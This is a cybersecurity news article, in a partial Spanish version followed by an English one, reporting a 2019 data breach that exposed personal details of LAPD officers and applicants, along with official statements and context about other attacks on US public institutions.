“Todos en LAPD estamos trabajando a marchas forzadas para entender todo lo relacionado con este incidente. Asimismo, estaremos implementando las medidas pertinentes para garantizar la seguridad de toda la información resguardada por la corporación. En LAPD estamos plenamente comprometidos con la protección de la privacidad de cualquier persona asociada a esta agencia”, agrega el comunicado de LAPD.

Por su parte, la oficina del Alcalde Eric Garcetti confirmó que “el incidente ocurrió en una base de datos que dejó de ser usada por LAPD hace algún tiempo, por lo que la información comprometida está desactualizada y es limitada”.

Acorde a especialistas en análisis de vulnerabilidades, aún no se ha determinado cómo se llevó a cabo la brecha de datos; del mismo modo, no se ha reportado la aparición de los registros comprometidos en foros de dark web o similares. El tiempo exacto que la información permaneció expuesta en línea también se desconoce.

El sindicato de la policía de Los Ángeles declaró que los afectados deberán ser protegidos contra cualquier variable de fraude de identidad, además, los expertos en análisis de vulnerabilidades de la ciudad deberán implementar las medidas necesarias para evitar que un incidente similar ocurra de nuevo.

Expertos en análisis de vulnerabilidades del Instituto Internacional de Seguridad Cibernética (IICS) mencionan que las brechas de datos que comprometen información de miembros de agencias del cumplimiento de la ley son casos especialmente preocupantes, pues los afectados se ven expuestos a ataques de phishing muy específicos que podrían servir a los hackers para acceder a información altamente confidencial.

La frecuencia con la que ocurren ciberataques en instituciones públicas en E.U. ha preocupado a las autoridades y miembros de la comunidad de la ciberseguridad. Hace un par de meses comenzó un brote de ransomware afectando las operaciones y servicios en los gobiernos locales de algunas ciudades en Florida, Nueva York, entre otros estados. Además, recientemente el gobierno de Louisiana lanzó una alerta de ciberseguridad a nivel estatal en relación con una infección de malware en los sistemas de decenas de escuelas. Aún no se ha encontrado un vínculo comprobable entre todos estos incidentes, no obstante, las autoridades estadounidenses no descartan ninguna posibilidad.


HACKERS ATTACK LOS ANGELES POLICE DEPARTMENT; THOUSANDS OF OFFICERS ARE BLACKMAILED USING THEIR PERSONAL DATA

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/07/30/hackers-attack-los-angeles-police-department-thousands-of-officers-are-blackmailed-using-their-personal-data/

Cybersecurity incidents keep happening in various public departments in multiple areas of the United States. This time, vulnerability analysis specialists report a data breach in Los Angeles Police Department (LAPD) systems. The incident would have compromised some personal details, such as full names, phones, email addresses, and passwords stored by the agency.

According to reports, the personal information of about 2,500 active officers and about 17,500 applicants to join the corporation were exposed during the incident, detected just a few days ago. Hackers even accessed the records of the LAPD applications status.

Through a statement, the department confirmed the data breach and stated that it has already begun work on containment and recovery of the incident. “We have notified directly to all potentially affected officers and applicants; we will continue to provide updates to the incident as they become available.”

“Everyone at LAPD is constantly working to understand everything related to this incident. We will also be implementing the relevant measures to ensure the security of all information held by the corporation. At LAPD we are fully committed to protecting the privacy of anyone associated with this agency,” the LAPD statement adds.

On the other hand, Mayor Eric Garcetti’s office confirmed that “the incident occurred in a database that was no longer used by LAPD since long time ago, so the compromised information is outdated and limited.”

According to vulnerability analysis specialists, how the data breach was conducted has not yet been determined; similarly, the appearance of compromised records in dark web forums or the like has not been reported. The exact time the information remained exposed online is also unknown.

The Los Angeles police union trade stated that those affected should be protected against any variables of identity fraud, and the city’s vulnerability analysis experts will have to implement the necessary measures to prevent a similar incident occur again.

Experts in vulnerability analysis from the International Institute of Cyber Security (IICS) mention that data breaches that compromise information from members of law enforcement agencies are particularly concerning cases, as affected are exposed to highly targeted phishing attacks that could help hackers to further access LAPD sensitive information.

The frequency with which cyberattacks occur in public institutions in the U.S. has concerned authorities and members of the cybersecurity community. A couple of months ago a ransomware outbreak began affecting operations and services in local governments in some cities in Florida, New York, among other states. In addition, the Louisiana government recently issued a state level cybersecurity alert regarding a malware infection in the systems of dozens of schools. A verifiable link has not yet been found between all these incidents, however, the U.S. authorities aren’t ruling out any possibility.